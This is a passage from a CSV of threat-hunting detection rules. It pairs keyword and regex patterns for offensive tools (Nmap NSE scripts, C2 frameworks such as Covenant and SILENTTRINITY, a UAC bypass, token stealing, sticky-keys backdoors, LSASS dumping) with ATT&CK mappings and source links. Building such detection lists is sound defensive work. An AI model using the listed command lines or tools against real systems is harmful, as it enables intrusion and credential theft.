- T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh2-enum-algos.nse*",".{0,1000}\sssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-auth-methods.nse*",".{0,1000}\sssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-brute.nse*",".{0,1000}\sssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-hostkey.nse*",".{0,1000}\sssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-log4shell.nse*",".{0,1000}\sssh\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. 
It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* ssh-publickey-acceptance.nse*",".{0,1000}\sssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-run.nse*",".{0,1000}\sssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sshv1.nse*",".{0,1000}\ssshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-ccs-injection.nse*",".{0,1000}\sssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-cert.nse*",".{0,1000}\sssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-cert-intaddr.nse*",".{0,1000}\sssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-date.nse*",".{0,1000}\sssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-dh-params.nse*",".{0,1000}\sssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-enum-ciphers.nse*",".{0,1000}\sssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-heartbleed.nse*",".{0,1000}\sssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-known-key.nse*",".{0,1000}\sssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-poodle.nse*",".{0,1000}\sssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2.nse*",".{0,1000}\ssslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2-drown.nse*",".{0,1000}\ssslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SspiUacBypass *",".{0,1000}\sSspiUacBypass\s.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* sstp-discover.nse*",".{0,1000}\ssstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* st client wss://*",".{0,1000}\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* st teamserver *",".{0,1000}\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* --stack-name catspin *",".{0,1000}\s\-\-stack\-name\scatspin\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-process64\s.{0,1000}\.exe\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* start covenant*",".{0,1000}\sstart\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* start_campaign.py*",".{0,1000}\sstart_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "* start_hidden_process*",".{0,1000}\sstart_hidden_process.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* StayKit.cna*",".{0,1000}\sStayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "* steal_token /process:* /command:*",".{0,1000}\ssteal_token\s\/process\:.{0,1000}\s\/command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* stealthily grabs passwords and browser history from windows systems*",".{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* stickykey.ps1*",".{0,1000}\sstickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "* Stickykeys.sh*",".{0,1000}\sStickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - 
T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* Stompy.ps1*",".{0,1000}\sStompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "* StomPY.py *",".{0,1000}\sStomPY\.py\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "* stop covenant*",".{0,1000}\sstop\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* striker.py*",".{0,1000}\sstriker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* string DCSync(*",".{0,1000}\sstring\sDCSync\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "* --string 'venomcoming' *",".{0,1000}\s\-\-string\s\'venomcoming\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - 
TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* --string 'venomleaving' *",".{0,1000}\s\-\-string\s\'venomleaving\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* stun-info.nse*",".{0,1000}\sstun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stun-version.nse*",".{0,1000}\sstun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stuxnet-detect.nse*",".{0,1000}\sstuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* submit_to_nemesis.py*",".{0,1000}\ssubmit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* submit_to_nemesis.sh*",".{0,1000}\ssubmit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* Successful authentication. Access and refresh tokens have been written to the global $apptokens variable. To use them with other GraphRunner modules use the Tokens flag *",".{0,1000}\sSuccessful\sauthentication\.\sAccess\sand\srefresh\stokens\shave\sbeen\swritten\sto\sthe\sglobal\s\$apptokens\svariable\.\sTo\suse\sthem\swith\sother\sGraphRunner\smodules\suse\sthe\sTokens\sflag\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* supermicro-ipmi-conf.nse*",".{0,1000}\ssupermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Supershell.tar.gz*",".{0,1000}\sSupershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -sV --script vulners *",".{0,1000}\s\-sV\s\-\-script\svulners\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* svn-brute.nse*",".{0,1000}\ssvn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SW2_HashSyscall*",".{0,1000}\sSW2_HashSyscall.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
